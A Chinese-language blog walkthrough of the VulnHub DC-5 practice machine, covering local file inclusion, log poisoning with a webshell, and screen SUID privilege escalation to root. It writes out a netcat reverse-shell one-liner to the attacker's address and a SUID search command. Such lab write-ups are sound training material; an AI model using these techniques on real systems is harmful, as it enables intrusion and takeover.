Vulnhub靶机之DC-5

        今天继续我们的vulnhub靶机系列,我们今天的靶场是DC-5,后面是下载地址https://download.vulnhub.com/dc/DC-5.zip,官网下载的还是挺快的,有需要网盘的朋友可以评论区留言。下面我们就开始打靶。

0x00导入靶场

 这一步比较简单,就不赘述,把靶场导进去就行了,要注意的是我们把网络适配器改为NAT模式,这里比较简单,也不赘述。

0x01信息收集

我们看看靶机的ip地址

因为我的kali机的ip地址是192.168.133.130,所以靶机的ip地址是192.168.133.132

我们看看靶机开放的端口

看到开放了80端口,我们访问一下看看

这都是些啥东西,看也看不懂,但发现contact界面可以提交东西,试了下xss,结果失败

偶然的发现刷新界面,下面的年份会发生改变

我猜就算没有后面的参数,刷新应该也会改变年份,我们试试看

果然发生该变 了

接着我们用dirsearch扫面看看

我们试试footer.php这个页面看看

刷新一下发现页面这个还是在变

thankyou.php页面包含了footer.php这个页面的东西,而且都会发生改变,于是联想到文件包含漏洞

试下/etc/passwd看看能不能成功

发现成功了

我们爆破看看能发现哪些文件

爆破出了日志文件

访问看看

0x02webshell注入

然后我们就尝试往日志文件写入一句话木马

然后我们用蚁剑连接·

我们打开终端 (点击第一个terminal )

先开一个监听端口

然后在蚁剑那个终端输入命令(注意ip是kali的ip,不是靶机的)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.133.130 4444 >/tmp/f

回去发现监听成功

我们输入命令变为交互方式

python -c 'import pty;pty.spawn("/bin/bash")';

0x03漏洞利用

看看能利用提权的文件或命令

find / -perm /4000 2>/dev/null

测试发现screen可以被拿来提权

我们用searchsploit看看能利用的方法

第一个就是我们能够利用的

我们看看文件的位置

看看里面的内容

我们根据里面的提示来,先创建一个libhax,c文件,把第一部分的C语言代码放进去,然后进行编译

然后保存接着编译

然后删除libhax.c文件

接着我们处理第二段C语言代码,一样的方式

然后新建一个dc5.sh文件,把刚才文件的C语言代码的部分删除重新保存

然后把刚才编译的文件上传到蚁剑里面的tmp目录下,点击upload file

然后把刚刚编译好的问价上传上去

 我们再重新开启一个新的监听

 在蚁剑的刚刚上传文件那里打开终端,输入命令

最下面那个Open Terminal Here

 

发现监听成功,然后输入命令变为交互模式

0x05提取权限

授予执行权限

然后提权

看看我们此时的权限已经是root权限了

下面就好整了,切换到root问价下,就看到了flag文件

cat一下问价就看到了flag文件的内容

成功拿下这个靶机。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值